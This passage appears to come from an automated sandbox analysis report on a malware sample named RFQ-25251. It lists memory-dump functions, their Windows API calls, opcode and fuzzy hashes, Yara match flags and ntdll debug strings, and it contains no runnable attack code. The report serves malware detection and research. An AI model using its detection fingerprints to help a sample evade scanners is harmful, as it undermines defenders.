                              Function 00417673 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                              Memory Dump Source
                              • Source File: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_400000_RFQ-25251.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                              • Instruction ID: 63ddb307992d993e20b5758824dbbb23b6c5c0d885c371cecfd37f145fc1fc2a
                              • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                              • Instruction Fuzzy Hash: 48011EB5E4020DABDF10DAE5DC42FDEB7789B54308F0081AAE90897240FA35EB548B95
                              Function 0042B233 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_400000_RFQ-25251.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                              • Instruction ID: da727019d85e71b4f98dc3c04865d8d3d54acb7ac2c2c1eb56f854e5711b10c9
                              • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                              • Instruction Fuzzy Hash: CCE04676640214BBC220AAAADC41FAB776CEFC6714F00402AFA0CA7242C6B4B90187F5
                              Function 012B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 367 12b2b60-12b2b6c LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: c5edcae73344b6e8329a0a00cc40fab6fea20f10ba9a678a59444c49d7206711
                              • Instruction ID: 4e87c89cba99e849d8c3ff59746b68b08802c828bb623884441288a6e4656d4b
                              • Opcode Fuzzy Hash: c5edcae73344b6e8329a0a00cc40fab6fea20f10ba9a678a59444c49d7206711
                              • Instruction Fuzzy Hash: 59900261212800034105715D4414616400A97E0601B55C125E3014590DC52689916225
                              Function 012B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 369 12b2df0-12b2dfc LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 6b0484a014786257545902ff4a1ea428ae2c2fe666da69a3520deb6eb2240e7f
                              • Instruction ID: 18807b59947fd8505f3a53fa6b9b9b8524e6eda6016e35404a1f83d6c183db96
                              • Opcode Fuzzy Hash: 6b0484a014786257545902ff4a1ea428ae2c2fe666da69a3520deb6eb2240e7f
                              • Instruction Fuzzy Hash: 6F90023121180413D111715D4504707000997D0641F95C516A2424558DD6578A52A221
                              Function 012B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 368 12b2c70-12b2c7c LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 517418c68671ee51055d2e1ae5a2ce33e471163abf262d7b8bc698f6bef24536
                              • Instruction ID: 253eb4231a81ff10a38c1ba649779af3941436829c9aa5b5a6bbec16ab3abb1f
                              • Opcode Fuzzy Hash: 517418c68671ee51055d2e1ae5a2ce33e471163abf262d7b8bc698f6bef24536
                              • Instruction Fuzzy Hash: 0690023121188802D110715D840474A000597D0701F59C515A6424658DC69689917221
                              Function 012B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 9c1d672112d3e7f705846e22a2da2a83e4d56d9bd76ed2730f875518846a08dd
                              • Instruction ID: 96ce5f832c28a8694df71163c148e41d3e3ac091210b1e2323e142ef58df1554
                              • Opcode Fuzzy Hash: 9c1d672112d3e7f705846e22a2da2a83e4d56d9bd76ed2730f875518846a08dd
                              • Instruction Fuzzy Hash: B390023161590402D100715D4514706100597D0601F65C515A2424568DC7968A5166A2
                              Function 00413C6C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_400000_RFQ-25251.jbxd
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID: C3vB7APK$C3vB7APK
                              • API String ID: 1836367815-224894077
                              • Opcode ID: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                              • Instruction ID: 5a9376cf19c71376eb6dcd9ad07240282008403dba884ccb0a10c61fd27c35d5
                              • Opcode Fuzzy Hash: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                              • Instruction Fuzzy Hash: 1B114872D0415C7AEB10ABE59C82DEFBB7CDF406A8F048069FE1077141D5685F0687E5
                              Function 00413C73 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_400000_RFQ-25251.jbxd
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID: C3vB7APK$C3vB7APK
                              • API String ID: 1836367815-224894077
                              • Opcode ID: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                              • Instruction ID: 4273e9db8a055284bf7aad7e038a2b9a4781de0a78bbed76330aa2944e199f6c
                              • Opcode Fuzzy Hash: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                              • Instruction Fuzzy Hash: CC0104B2D0011C7AEB10ABE59C82DEFBB7CDF40698F058069FA14B7241D5685F068BE5
                              Function 0042B5A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_400000_RFQ-25251.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID: !dA
                              • API String ID: 3298025750-3330550368
                              • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                              • Instruction ID: 28da6497efbab91fddcaddee6dcc59dcba5a5150a74096bf66e05214206e21d5
                              • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                              • Instruction Fuzzy Hash: A4E06DB2640208BBD610EE99DC41EAB33ACEFCA710F000019F909A7242C670B9108AB9
                              Function 0042B553 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                              APIs
                              • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                              Memory Dump Source
                              • Source File: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_400000_RFQ-25251.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                              • Instruction ID: 1e45151d5ae518e03348f57204b76deaae3a37f6371d957f2058fa57962241ea
                              • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                              • Instruction Fuzzy Hash: A8E06DB1604244BBD614EE99DC41EAF37ACEFC6710F000019F908A7242C670B91086B9
                              Function 0042B5F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                              APIs
                              • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                              Memory Dump Source
                              • Source File: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_400000_RFQ-25251.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                              • Instruction ID: 5260f22870e994c6374de7522158ff438fff32bc85833648b073e817e0388f48
                              • Opcode Fuzzy Hash: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                              • Instruction Fuzzy Hash: 5EE04F72600214BBD220AA6ADC41F9B775CDFC5714F004469FA0CA7246CAB5B90186B4
                              Function 012B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 363 12b2c0a-12b2c0f 364 12b2c1f-12b2c26 LdrInitializeThunk 363->364 365 12b2c11-12b2c18 363->365
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 88d0338d6dbce98ba21abdf704acba42ee5ea597e93ca2cdbe335f3fcc09fc3c
                              • Instruction ID: e56e6dc7bca76e7b217ab82afab53081190b6ad33640e282be6d3c992ed4107b
                              • Opcode Fuzzy Hash: 88d0338d6dbce98ba21abdf704acba42ee5ea597e93ca2cdbe335f3fcc09fc3c
                              • Instruction Fuzzy Hash: 8EB09B719119D5C5DA11E76446087177A0077D0741F16C165D3030641F4739D5D1E375

                              Non-executed Functions

                              Function 012F2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-2160512332
                              • Opcode ID: 1c5ef79dfea2b817f9126707083c878ff4a539562e67ae7d99184ac3f2183e60
                              • Instruction ID: 7da0da4a5387cc67bdfa28cd2b13bc4d14d996a907cd391bd481e9438be29606
                              • Opcode Fuzzy Hash: 1c5ef79dfea2b817f9126707083c878ff4a539562e67ae7d99184ac3f2183e60
                              • Instruction Fuzzy Hash: 5C928A71624742EBE721DE28C881B6BFBE8BB85754F04492DFB94D7290D770E844CB92
                              Function 012A8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                              Download Yara Rule
                              Strings
                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012E54CE
                              • Critical section address, xrefs: 012E5425, 012E54BC, 012E5534
                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012E54E2
                              • Critical section debug info address, xrefs: 012E541F, 012E552E
                              • Address of the debug info found in the active list., xrefs: 012E54AE, 012E54FA
                              • double initialized or corrupted critical section, xrefs: 012E5508
                              • Thread is in a state in which it cannot own a critical section, xrefs: 012E5543
                              • Invalid debug info address of this critical section, xrefs: 012E54B6
                              • Thread identifier, xrefs: 012E553A
                              • Critical section address., xrefs: 012E5502
                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012E540A, 012E5496, 012E5519
                              • corrupted critical section, xrefs: 012E54C2
                              • 8, xrefs: 012E52E3
                              • undeleted critical section in freed memory, xrefs: 012E542B
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                              • API String ID: 0-2368682639
                              • Opcode ID: 7eb60876425325e224b995b471cbcc87463e9c925c517da28bfbb310e79d35b1
                              • Instruction ID: 086b5585c33a37b7210b2a77b8cf412b261141e1423cf042534b61b80c5ccf0f
                              • Opcode Fuzzy Hash: 7eb60876425325e224b995b471cbcc87463e9c925c517da28bfbb310e79d35b1
                              • Instruction Fuzzy Hash: 0881A274A60349EFDB60CF9AC885BAEBBF9FB08718F504119FA05B7251D3B5A940CB50
                              Function 012A29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                              Download Yara Rule
                              Strings
                              • @, xrefs: 012E259B
                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 012E2409
                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012E22E4
                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 012E2506
                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012E25EB
                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 012E261F
                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 012E2412
                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 012E2498
                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 012E2624
                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012E24C0
                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 012E2602
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                              • API String ID: 0-4009184096
                              • Opcode ID: 49c986624a3fd8f789049f784169fd77d21cb8d224cdce3c5d07de794d8448fc
                              • Instruction ID: a8a060794dae3c06980f9966d983e2c4badd676fcc218994784ea153fd10baef
                              • Opcode Fuzzy Hash: 49c986624a3fd8f789049f784169fd77d21cb8d224cdce3c5d07de794d8448fc
                              • Instruction Fuzzy Hash: B60292B1D20229DFDB31DB54CD85BE9B7B8AB44304F8141EAEB09A7241DB709E84CF59
                              Function 01318B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                              • API String ID: 0-2515994595
                              • Opcode ID: f22a49b676b05f2032b8cd064480cdd344ec6d0bed88704d23e200b427e1f059
                              • Instruction ID: 615429cf954996bc98cacbc60352f6ec68315c0440b34b20a802d7111f1034e0
                              • Opcode Fuzzy Hash: f22a49b676b05f2032b8cd064480cdd344ec6d0bed88704d23e200b427e1f059
                              • Instruction Fuzzy Hash: 835100B12243059BD72DDF188884BABBBECFF94348F54495DE958C3244E770D608CB96
                              Function 01320274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                              • API String ID: 0-1700792311
                              • Opcode ID: a53228bc4e4fbd79864c8ae4d7b3125072be1552a751ce5ac0d99906fad0abef
                              • Instruction ID: 532ed6586c8943429631fb5e7b9341d14095f3702a4937154790f7adc60e2160
                              • Opcode Fuzzy Hash: a53228bc4e4fbd79864c8ae4d7b3125072be1552a751ce5ac0d99906fad0abef
                              • Instruction Fuzzy Hash: 38D11031A10695DFDB2AEF68C440AADBBF5FF0A718F18C059F4459B662C7359888CF50
                              Function 012F89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                              Download Yara Rule
                              Strings
                              • VerifierDebug, xrefs: 012F8CA5
                              • VerifierDlls, xrefs: 012F8CBD
                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 012F8A3D
                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 012F8A67
                              • AVRF: -*- final list of providers -*- , xrefs: 012F8B8F
                              • VerifierFlags, xrefs: 012F8C50
                              • HandleTraces, xrefs: 012F8C8F
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                              • API String ID: 0-3223716464
                              • Opcode ID: 56d1d849136eca01e8d71ad67e375c9324d471696a31d200806a8a0e680e721b
                              • Instruction ID: 2f804bae85ced0af6f651d58f4d29b7d6cc5240ed1a4b040b8b2d9e90703e306
                              • Opcode Fuzzy Hash: 56d1d849136eca01e8d71ad67e375c9324d471696a31d200806a8a0e680e721b
                              • Instruction Fuzzy Hash: EE912772665306AFD721EF28C881B2AFBA8EF54B54F04443CFB41AB294D7709C44C791
                              Function 0127EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                              • API String ID: 0-1109411897
                              • Opcode ID: 286773805e650d531431188d4dfd6f3c52538181677dc13a62b99aec81e1c58e
                              • Instruction ID: 671eb483bd19e3405d92d4d5420a379220ac1321bfc0df146c7d3f12b6ca6d89
                              • Opcode Fuzzy Hash: 286773805e650d531431188d4dfd6f3c52538181677dc13a62b99aec81e1c58e
                              • Instruction Fuzzy Hash: 0CA25974A2566A8FDB64DF18CD887AABBB5EF45304F1442E9D91DA7290DB709EC0CF00
                              Function 012A63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-792281065
                              • Opcode ID: 333ce684e75d7d7c0b315ee9ad96d8e25a0b0f77a7be3653b3c55b335e62dd35
                              • Instruction ID: 7f2ae38696db00d99937e9f03063cf4d991755faa30b8d214cd84cd535cb17f1
                              • Opcode Fuzzy Hash: 333ce684e75d7d7c0b315ee9ad96d8e25a0b0f77a7be3653b3c55b335e62dd35
                              • Instruction Fuzzy Hash: 18914970A30352DBEB35EF58D849BBA7BE5FB11B54F88412CDA04AB2D1D7B49801C790
                              Function 0126645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                              Download Yara Rule
                              Strings
                              • minkernel\ntdll\ldrinit.c, xrefs: 012C9A11, 012C9A3A
                              • apphelp.dll, xrefs: 01266496
                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 012C9A2A
                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 012C9A01
                              • LdrpInitShimEngine, xrefs: 012C99F4, 012C9A07, 012C9A30
                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012C99ED
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                              • API String ID: 0-204845295
                              • Opcode ID: 0b94ce351230cf072fbc649e7e7579c3287112d56623b07d7af07036e9ebf992
                              • Instruction ID: 1b8356057f6d8a3e8874936024ba75a3cca4078f17281aa9a931ebb4362e5f86
                              • Opcode Fuzzy Hash: 0b94ce351230cf072fbc649e7e7579c3287112d56623b07d7af07036e9ebf992
                              • Instruction Fuzzy Hash: 6251C571278305DFDB24DF28D892B6B77E8FB84B48F104A1DF685971A0D670E984CB92
                              Function 012A2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                              Download Yara Rule
                              Strings
                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012E21BF
                              • RtlGetAssemblyStorageRoot, xrefs: 012E2160, 012E219A, 012E21BA
                              • SXS: %s() passed the empty activation context, xrefs: 012E2165
                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 012E2178
                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 012E219F
                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 012E2180
                              Memory Dump Source
                              • Source File: 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, Offset: 01240000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_1240000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                              • API String ID: 0-861424205
                              • Opcode ID: 2aa1d6fc89361c0ff0f012b8eccf18e894cd0d56f01d084175719aedb8c0b94e
                              • Instruction ID: 929cd673c67b9d7710f669a3a65fa02f62d5f7724dd209543601c83288d79f70
                              • Opcode Fuzzy Hash: 2aa1d6fc89361c0ff0f012b8eccf18e894cd0d56f01d084175719aedb8c0b94e
                              • Instruction Fuzzy Hash: BB31393ABB0212F7E7258A998C89F6A7BBCDB64B40F85005DFF056B201D270DB00D3A1
                              Function 012AC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                              Download Yara Rule
                              Strings
